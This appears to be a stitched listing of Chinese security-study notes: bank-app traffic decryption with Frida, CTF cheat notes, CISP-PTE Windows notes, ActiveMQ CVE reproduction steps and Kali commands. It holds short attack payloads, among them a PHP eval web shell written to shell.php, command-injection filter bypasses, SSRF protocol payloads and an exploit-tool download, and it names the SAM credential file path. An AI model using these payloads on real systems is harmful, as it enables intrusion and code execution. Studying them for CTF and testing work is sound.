通过Frida绕过银行app加密实现明文传输

· 已root的安卓机(小于Android 10)
· adb —— 用于调试Android设备
· Frida —— 用于对apk内的部分验证代码进行Hook
· Burpsuite —— 用于抓包
· OpenSSL —— 用于生成证书及转换证书格式
· HTTPDecrypt —— 用于利用HTTP协议 远程加解密数据包
· Magisk —— 绕过银行app对root的检测

App双向SSL校验绕过

#准备工作

· 已root的安卓机(小于Android 10)
· adb —— 用于调试Android设备
· Frida —— 用于对apk内的部分验证代码进行Hook
· Burpsuite —— 用于抓包
· OpenSSL —— 用于生成证书及转换证书格式

CTF笔记

#信息泄漏

目录遍历工具:disearch
.git文件恢复工具:GitHack

1
2
3
4
5
6
7
git log
git diff --head //比较不同
git reset --head //恢复到某版本
git stash list //查看保存的工作现场列表
git stash pop //恢复工作现场
git stash show //显示做了哪些改动
git stash show -p //显示第一个保存的工作现场的改动

svn泄漏/hg泄漏工具:dvcs-ripper

#文件包含

1
<?php system('ls /');?>

#命令执行

1
2
3
echo "<?php @eval(\$_POST['a']);?>" >> shell.php
分隔符被过滤-->%0a %0d
空格被过滤-->IFS$9、%09、<、>、<>、{,}、%20、${IFS}、${IFS}

#SSRF

#伪协议

1
2
3
4
5
6
file:///
dict://
sftp://
ldap://
tftp://
gopher://

file:///var/www/html/flag.php //查看源代码
dict://127.0.0.1:$port$ //结合burp扫码端口

CISP-PTE课程

#操作系统安全

#WIndows操作系统安全

windows的用户标识:SID

1
2
3
4
5
6
7
administartor:500--0x1f4
guest:501--ox1f5
普通用户:从1000开始--ox3e8
内置账号:
system
local service
network service

C:\windows\system32\config\SAM
HKEY_LOCAL+MACHINE\SAM\SAM\Domains\Account\Users\Names
查看用户SID:whoami/user
查看组SID:whoami/groups
查看用户特权:whoami/priv
查看服务SID:sc showsid server_name

ActiveMQ CVE-2015-5254 反序列化漏洞

#漏洞原理

该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

#复现步骤

  • 构造(可以使用ysoserial)可执行命令的序列化对象
    1
    wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
  • 作为一个消息,发送给目标61616端口
  • 访问的Web管理页面,读取消息,触发漏洞

ActiveMQ CVE-2016-3088 任意文件写入漏洞

#漏洞原理

fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要PUT写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。

#复现步骤

1
docker ps //查看端口
  • 页面登陆ip:8800端口
  • 登陆账号 admin/admin
  • 进入fileserver页面 抓包

redis未授权访问

#redis的安装

1
2
3
4
5
6
7
8
9
10
11
12
wget http://download.redis.io/releases/redis-3.2.11.tar.gz //下载redis
tar zxvf redis-3.2.11.tar.gz //解压
cd redis-3.2.11
make
make test
cp redis.conf /etc/
cd /src/
cp redis-server /usr/bin/
cp redis-cli /use/bin/
cd ../
vim /etc/redis.conf
redis-server /etc/redis.conf

kali常见指令

#KALI常见指令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ps aux //查看进程
ps aux|grep [nginx] //查看nginx进程
ps -u [root] //查看root用户进程
#案例
ps aux|grep 30504
ls -lh /proc/30504
top //查看实时进程 P:以cup占用降序排序 M:以内存占用降序排序 C:完整命令内容
netstat -anp //端口占用信息
netstat -anpt //只查看tcp端口信息
uname -a //查看当前操作的Linux内核
lsb_release -a //查看发行版本
cat head tail //查看文件全部&头部&尾部 -n参数指定输出行数
tail -f auth.log //实时地输出最新的日志
ls /var/log //查看日志目录
crontab -l //列表系统的计划任务
crontab -e //进入编辑模式
crontab -u root -e //查看特定用户的计划任务
cat /var/spool/cron/crontabs/[root] //查看不同用户的计划任务
history //历史命令操作记录
cat ~/.bash_history //查看命令操作历史
lastlog //最后登录信息
*last -f/var/log/wtmp //历史用户登录信息
find . -name "*.txt" //当前目录查找txt文件

#查找时间范围内修改文件
touch -t time1 t_start //touch:生成空文件
touch -t time2 t_end
find . -type f -newer t_start ! -newer t_end //查找时间段内修改的文件

Ctfhub-wp

#常见的搜集

1.查看泄漏目录python3 dirsearch.py -u http://challenge-ff56d3fec964fb86.sandbox.ctfhub.com:10080/
upload successful